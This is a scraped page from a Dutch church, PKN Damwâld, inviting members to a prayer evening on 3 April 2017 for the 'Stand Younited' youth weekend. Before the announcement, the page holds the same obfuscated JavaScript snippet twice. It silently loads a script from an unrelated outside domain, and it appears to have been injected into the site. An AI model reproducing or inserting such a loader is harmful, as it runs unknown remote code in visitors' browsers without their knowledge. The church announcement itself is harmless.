;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bid jij mee in de voorbereidingen voor Stand Younited? - PKN Damwâld
3 april 2017
20:00 t/m 21:00
Bid jij mee in de voorbereidingen voor Stand Younited?

Wellicht heeft u het al mee gekregen: Het Stand Younited weekend gaat weer van start. 23, 24 en 25 juni is het zover!! We staan dit jaar stil bij het thema ‘Follow the Leader!’ We willen met de jongeren dieper ingaan op wie van invloed zijn op hun leven en wat voor keuzes zij hierin kunnen en mogen maken. In het vervolg hierop willen we met hen spreken over de rol die Jezus in hun leven in wil nemen. En wat de gevolgen van het navolgen van Jezus van invloed heeft op je dagelijkse keuzes.

Bij dit alles is gebed hard nodig. Biddende ‘broers’ en ‘zussen‘!!! Bidden voor de voorbereidingen in allerlei teams, bidden voor leiding en jongeren die gaan komen. Een gebedsteam is hierbij onmisbaar! Wilt u mee bidden? We komen op 3 april om 20.00 uur samen op Singel 22 in Damwoude. Daar spreken we verder avonden af. Het is fijn als u de volgende avonden er ook bij wilt zijn maar dat is natuurlijk niet verplicht. Verdere datums vindt u straks op www.stand-younited.nl. Maar vooreerst tot ziens op 3 april aan de Singel!

Met vriendelijke groet,

Het Stand Younited team